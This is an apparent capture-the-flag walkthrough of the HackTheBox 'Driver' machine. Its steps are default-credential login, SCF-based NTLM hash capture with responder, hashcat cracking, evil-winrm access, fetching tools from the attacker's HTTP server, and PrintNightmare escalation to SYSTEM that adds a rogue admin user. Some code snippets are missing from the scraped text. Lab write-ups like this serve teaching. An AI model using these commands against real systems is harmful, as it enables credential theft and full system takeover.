nmap -sC -sS -sV -F 10.10.11.106 >scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 13:34 EEST Nmap scan report for 10.10.11.106 (10.10.11.106) Host is up (0.084s latency). Not shown: 97 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Microsoft-IIS/10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-time: | date: 2021-10-16T17:34:49 |_ start_date: 2021-10-16T15:11:52 | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.57 seconds
If we try to enter to the webpage, it requests a login. I just tried admin - admin and it worked…
/etc/hosts, we can see Firmware Updates as the only working tab.
Getting the foothold
… firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
According to the text in the page, the file is beign uploaded to the SMB share, which the team will review the uploads.
A Shell Command File (
.scf) gets executed if the user browses the file. We can include a remote path for the icon and the browse will try to authenticate with its credentials to the given path.
If we upload the SCF
@zebra.scf (we can use
@ so the file stays at the top of the share) with the given content:
responder, we can grab the user hash:
responder -wrf --lm -v -I tun0
We get the following:
To crack the NTLMv2 Hash, we can dump it to a file (
hash.txt) and crack it using hashcat:
hashcat -m 5600 hash.txt /usr/share/dict/rockyou.txt -o cracked.txt
After getting the password, we might be able to login. The shared folders in Samba doesn’t seem to be accessible. I couldn’t find anything for a while, so I decided to do a deeper port scan.
There is a port open
:5985, which appears at
nmap as an HTTP service but googling it shows it is actually a remote management service for Windows (like a SSH). By using
evil-winrm we can connect to the user using the cracked password.
evil-winrm -i 10.10.11.106 -u tony -p *****
Aaand we got the user flag!
We don’t have connection to the Internet to download privilege escalation scripts. But we can open a local HTTP server in a folder with the tools:
python -m http.server -d ../Tools 8080
In the reverse shell, we can download them with
Invoke-WebRequest http://10.10.14.111:8080/winPEAS.bat -OutFile winpeas.bat
After scanning and not finding anything, I googled the vulnerabilities available for the current version. The most recent one is about Printer Spooler (PrintNightmare), which let’s you escale privileges easily.
To use the CVE exploit, I followed this blog post. As a summary, you have to start the SMB service in your host, share a
.dll which contains a reverse shell, call the python exploit and wait for the shell to connect.
After those steps, we have authority.
C:\Windows\system32>whoami nt authority\system
Then, we can get the root flag as usual by going to the Administrator’s desktop.
C:\Users\Administrator\Desktop>type root.txt ******************
To know more
First of all, I was lucky to hit the right with the Printer Spooler, but the correct way to check it was to
rpcdump.py @10.10.11.106 | grep MS-RPRN
We can only run the
printnightmare exploit when the Print System Remote Protocol exists.
That script gave us access to the Administrator account. Although, it seems like he has not many administrator rights (in order to own the whole machine). Another way to perform the
printnightmare exploit is by running the script locally from tony’s PS session.
upload command we can upload our local copy of the exploit so user tony can execute it. But the Execution Policy is restricted, so we are not able to run the script as usual. We have to bypass the Execution Policy (there are a lot of ways, but I chose a simple one) by using the
python -m http.server 8001
IEX command automatically imports the module, so we can simply run:
Invoke-Nightmare -NewUser "zebra" -NewPassword "zebra1234"
And connect to the new user with
evil-winrm, this one will have all the administrator rights.
- More info about PrintNightmare:Playing with PrintNightmareCVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows for a low priv user to escalate to administrator on a local box or on a remote server. This is especially bad because it is not uncommon for Domain Controllers to have an exposed print spooler, and thus, this exploit can take an attacker from low-priv user to domain admin. There are a few proof of concept exploits out there, and I wanted to give them a spin an old HackTheBox machine. I’ll also look at disabling the Print Spooler and how it breaks the exploits, and discuss the July 6 patch.
- Invoke-Nightmare powershell moduleGitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare) - GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Prin...